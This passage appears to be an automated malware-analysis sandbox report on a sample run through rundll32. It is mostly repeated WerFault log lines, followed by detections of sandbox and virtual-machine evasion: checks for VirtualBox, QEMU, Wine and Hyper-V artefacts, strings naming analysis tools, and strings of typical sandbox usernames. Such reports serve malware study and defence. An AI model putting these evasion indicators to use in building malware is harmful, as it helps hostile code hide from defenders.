              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\WineJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\WineJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: rundll32.exeBinary or memory string: PROCMON.EXE
              Source: rundll32.exeBinary or memory string: HOOKEXPLORER.EXE
              Source: rundll32.exeBinary or memory string: AUTORUNSC.EXE
              Source: rundll32.exeBinary or memory string: JOEBOXSERVER.EXE
              Source: rundll32.exeBinary or memory string: OLLYDBG.EXE
              Source: rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPCVBOXTRAYTOOLWNDCLASSCHECKING DEVICE %S VIRTUALBOX SHARED FOLDERSVBOXTRAYTOOLWNDVBOXTRAY.EXEVBOXSERVICE.EXESELECT * FROM WIN32_NETWORKADAPTERCONFIGURATIONCHECKING VIRTUALBOX PROCESS %S 08:00:27MACADDRESSVBOXVIDEOW8VBOXVIDEOSELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMSYSTEMFILENAMEVIRTUALBOXSOURCESVBOXVBOXDEVICEIDSELECT * FROM WIN32_PNPENTITYNAMEPCI\VEN_80EE&DEV_CAFE82441FX82801FBOPENHCD82371SBACPIBUS_BUS_0SELECT * FROM WIN32_BUSPNP_BUS_0PCI_BUS_0PRODUCTSELECT * FROM WIN32_BASEBOARDMANUFACTURERVIRTUALBOXSELECT * FROM WIN32_PNPDEVICEORACLE CORPORATIONPNPDEVICEIDCAPTIONVEN_VBOXQEMU-GA.EXEQEMUVDSERVICE.EXEVDAGENT.EXEQEMU-GACHECKING QEMU PROCESSES %S CHECKING QEMU DIRECTORY %S SPICE GUEST TOOLSQEMUQEMUBXPCBOCHSSOFTWARE\WINEWINE_GET_UNIX_FILE_NAMESYSTEM\CONTROLSET001\SERVICES\VIOSCSISYSTEM\CONTROLSET001\SERVICES\VIRTIO-FS SERVICESYSTEM\CONTROLSET001\SERVICES\VIOSTORSYSTEM\CONTROLSET001\SERVICES\BALLOONSYSTEM\CONTROLSET001\SERVICES\VIRTIOSERIALSYSTEM\CONTROLSET001\SERVICES\NETKVMSYSTEM\CONTROLSET001\SERVICES\BALLOONSERVICESYSTEM32\DRIVERS\NETKVM.SYSSYSTEM32\DRIVERS\BALLOON.SYSSYSTEM32\DRIVERS\VIOFS.SYSSYSTEM32\DRIVERS\PVPANIC.SYSSYSTEM32\DRIVERS\VIOINPUT.SYSSYSTEM32\DRIVERS\VIOGPUDO.SYSSYSTEM32\DRIVERS\VIOSCSI.SYSSYSTEM32\DRIVERS\VIORNG.SYSSYSTEM32\DRIVERS\VIOSTOR.SYSSYSTEM32\DRIVERS\VIOSER.SYSVIRTIO-WIN\CURRENTUSEREMILYSANDBOXHONG LEEHAPUBWSJOHNSONIT-ADMINMILOZSMILLERTIMMYPETER WILSONMALWARESAND BOXTEST USERMALTESTJOHN DOEVIRUSCHECKING IF USERNAME MATCHES : %S VMWARESELECT * FROM WIN32_COMPUTERSYSTEMHVM DOMUMODELPROCEXP64.EXEDESKTOPPRL_CC.EXECHECKING PARALLELS PROCESSES: %SPRL_TOOLS.EXE
              Source: rundll32.exeBinary or memory string: QEMU-GA.EXE
              Source: rundll32.exe, rundll32.exe, 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: rundll32.exeBinary or memory string: VMUSRVC.EXE
              Source: rundll32.exeBinary or memory string: REGMON.EXE
              Source: rundll32.exe, 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.546518728.0000021520469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >VMUSRVC.EXEVMSRVC.EXECHECKING VIRTUAL PC PROCESSES %S
              Source: rundll32.exeBinary or memory string: WINDBG.EXE
              Source: rundll32.exeBinary or memory string: AUTORUNS.EXE
              Source: rundll32.exeBinary or memory string: IMPORTREC.EXE
              Source: rundll32.exeBinary or memory string: PETOOLS.EXE
              Source: rundll32.exeBinary or memory string: PROC_ANALYZER.EXE
              Source: rundll32.exeBinary or memory string: SNIFF_HIT.EXE
              Source: rundll32.exeBinary or memory string: JOEBOXCONTROL.EXE
              Source: rundll32.exeBinary or memory string: IDAQ.EXE
              Source: rundll32.exeBinary or memory string: SYSANALYZER.EXE
              Source: rundll32.exeBinary or memory string: DUMPCAP.EXE
              Source: rundll32.exeBinary or memory string: WIRESHARK.EXE
              Source: rundll32.exeBinary or memory string: FILEMON.EXE
              Contain functionality to detect virtual machines
              Source: C:\Windows\System32\rundll32.exeCode function: VBOX VBOX VEN_VBOX 14_2_00000215205CEA60
              Source: C:\Windows\System32\rundll32.exeCode function: QEMU QEMU 14_2_00000215205CECF0
              Source: C:\Windows\System32\rundll32.exeCode function: VBoxTrayToolWndClass VBoxTrayToolWnd 14_2_00000215205CCD00
              Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 14_2_00000215205CEDE0
              Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 14_2_00000215205CEEA0
              Source: C:\Windows\System32\rundll32.exeCode function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 14_2_00000215205CD380
              Source: C:\Windows\System32\rundll32.exeCode function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 14_2_00000215205CD4D0
              Source: C:\Windows\System32\rundll32.exeCode function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 14_2_00000215205CD870
              Source: C:\Windows\System32\rundll32.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe 14_2_00000215205CDA30
              Source: C:\Windows\System32\rundll32.exeCode function: vboxvideo VBoxVideoW8 VBoxWddm 14_2_00000215205CDCC0
              Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 14_2_00000215205CDFD0
              Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 14_2_00000215205CE070
              Source: C:\Windows\System32\rundll32.exeCode function: qemu qemu QEMU QEMU 14_2_00000215205CF080
              Source: C:\Windows\System32\rundll32.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe 19_2_00000285C809DA30
              Source: C:\Windows\System32\rundll32.exeCode function: vboxvideo VBoxVideoW8 VBoxWddm 19_2_00000285C809DCC0
              Source: C:\Windows\System32\rundll32.exeCode function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 19_2_00000285C809D380
              Source: C:\Windows\System32\rundll32.exeCode function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 19_2_00000285C809D4D0
              Source: C:\Windows\System32\rundll32.exeCode function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 19_2_00000285C809D870
              Source: C:\Windows\System32\rundll32.exeCode function: VBOX VBOX VEN_VBOX 19_2_00000285C809EA60
              Source: C:\Windows\System32\rundll32.exeCode function: QEMU QEMU 19_2_00000285C809ECF0
              Source: C:\Windows\System32\rundll32.exeCode function: VBoxTrayToolWndClass VBoxTrayToolWnd 19_2_00000285C809CD00
              Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 19_2_00000285C809EDE0
              Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 19_2_00000285C809EEA0
              Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 19_2_00000285C809DFD0
              Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 19_2_00000285C809E070
              Source: C:\Windows\System32\rundll32.exeCode function: qemu qemu QEMU QEMU 19_2_00000285C809F080
              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\System32\loaddll64.exe TID: 6544Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: VBoxGuestJump to behavior
              Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: VBoxTrayIPCJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
              Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDateJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
              Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
              Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Windows\System32\rundll32.exeAPI coverage: 5.2 %
              Source: C:\Windows\System32\rundll32.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,14_2_00000215205D0220
              Source: C:\Windows\System32\rundll32.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,19_2_00000285C80A0220
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,2_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,2_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EE00C FindFirstFileExA,2_2_00007FFA535EE00C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520614570 FindFirstFileExA,14_2_0000021520614570
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,14_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,14_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535EE00C FindFirstFileExA,14_2_00007FFA535EE00C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E4570 FindFirstFileExA,19_2_00000285C80E4570
              Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
              Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_2-7955
              Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_2-8036
              Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: rundll32.exeBinary or memory string: vboxtray.exe
              Source: rundll32.exe, 0000000E.00000002.546408144.000002152028C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.548511801.00000285C7D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
              Source: rundll32.exeBinary or memory string: Checking qemu processes %s
              Source: rundll32.exeBinary or memory string: qemu-ga.exe
              Source: rundll32.exeBinary or memory string: \\.\VBoxMiniRdrDN
              Source: WerFault.exe, 00000017.00000003.531814620.000001CE20763000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000002.541991231.000001CE1EA66000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000002.542772741.000001CE20763000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000002.540850125.00000186843CB000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.540993777.000001F5F18BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: rundll32.exeBinary or memory string: VBoxTrayToolWnd
              Source: rundll32.exeBinary or memory string: \\.\VBoxTrayIPC
